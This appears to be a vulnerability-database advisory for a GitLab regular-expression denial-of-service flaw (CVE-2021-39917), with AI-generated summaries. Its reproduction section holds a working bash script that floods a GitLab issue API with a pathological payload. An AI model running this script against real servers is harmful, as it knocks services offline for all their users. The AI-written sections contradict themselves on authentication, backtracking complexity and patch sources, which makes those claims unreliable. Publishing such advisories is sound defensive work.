CVE-2021-39917
Description
An issue has been discovered in GitLab CE/EE affecting all versions starting from 12.9 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. A regular expression related to quick actions features was susceptible to catastrophic backtracking that could cause a DOS attack.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
GitLab CE/EE versions 12.9 through 14.5.1 contain a ReDoS vulnerability in quick actions extraction, allowing unauthenticated denial-of-service via crafted inline code.
Vulnerability
The GitLab quick actions feature uses a regular expression INLINE_CODE_REGEX in lib/gitlab/quick_actions/extractor.rb to exclude inline code blocks from being parsed as quick commands [1]. This regex has cubic time complexity due to nested quantifiers, enabling catastrophic backtracking. All versions from 12.9 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2 are affected [1].
Exploitation
An attacker with the ability to create or edit issues, merge requests, or comments (including unauthenticated users if public projects exist) can send a crafted payload: backtick followed by approximately 100,000 newlines and a single character (e.g., ` ` + \n*100000 + x`) [1]. By submitting 50 such issues via the API, the attacker triggers exponential backtracking, consuming CPU on the GitLab server [1]. The vulnerability is present in the issue creation API endpoint [1].
Impact
Successful exploitation causes a denial-of-service (DoS) condition [1]. The GitLab application becomes unresponsive while processing the malicious input due to CPU exhaustion, affecting all users of the instance [1].
Mitigation
GitLab released fixed versions: 14.3.6, 14.4.4, and 14.5.2 [1]. Users should upgrade immediately. No workaround is available; disabling the quick actions feature is not configurable [1]. This CVE is not currently listed in CISA's Known Exploited Vulnerabilities catalog.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Range: >=12.9 <14.3.6, >=14.4 <14.4.4, >=14.5 <14.5.2
- Range: >=12.9, <14.3.6
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The `INLINE_CODE_REGEX` pattern uses nested quantifiers (`\n* .+? \n*`) that cause cubic catastrophic backtracking when processing a backtick followed by many newlines."
Attack vector
An attacker with an API token and the ability to create issues on at least one project sends a crafted payload — a backtick followed by many newlines and a single character (e.g. ``"`"+"\n"*100000+"x"``) — as the issue description. The `INLINE_CODE_REGEX` has cubic complexity, so processing this input causes catastrophic backtracking that consumes excessive CPU, rendering the GitLab instance unresponsive [ref_id=1].
Affected code
The vulnerable regex is defined in `lib/gitlab/quick_actions/extractor.rb` as `INLINE_CODE_REGEX`, which matches inline code blocks spanning multiple lines. This regex is combined into `EXCLUSION_REGEX` and matched against the body of issues, comments, and other markdown content to exclude certain elements from quick-action processing [ref_id=1].
What the fix does
The advisory does not include a published patch diff, but the fix would need to rewrite `INLINE_CODE_REGEX` to avoid nested quantifiers that cause cubic backtracking. The remediation guidance is implicit in the issue report: the regex pattern `` `\n* .+? \n*` `` should be replaced with a non-backtracking or atomic equivalent to eliminate catastrophic backtracking when processing pathological inputs [ref_id=1].
Preconditions
- authAttacker must have a valid API token for the GitLab instance
- inputAttacker must be able to create issues on at least one project
- configThe GitLab instance must be running an affected version (12.9 through 14.5.1)
Reproduction
1. Obtain a GitLab API token and a project ID where you can create issues. 2. Run the following bash script (adjust `GITLAB_HOST`, `PROJECT_ID`, and `AUTH_TOKEN`): ```bash PROTO=https GITLAB_HOST=your-gitlab-instance PROJECT_ID=xxxxxx AUTH_TOKEN=xxxxxx PAYLOAD=$(ruby -e'print "`"+"\n"*100000+"x"') for i in {1..50}; do curl -X POST \ "${PROTO}://${GITLAB_HOST}/api/v4/projects/${PROJECT_ID}/issues" \ -H "Private-Token: ${AUTH_TOKEN}" \ --data "title=issue_${RANDOM}_${RANDOM}" \ --data "description=${PAYLOAD}" & done ``` 3. The GitLab instance becomes unresponsive due to CPU exhaustion [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39917.jsonmitrex_refsource_CONFIRM
- gitlab.com/gitlab-org/gitlab/-/issues/338486mitrex_refsource_MISC
- hackerone.com/reports/1277918mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.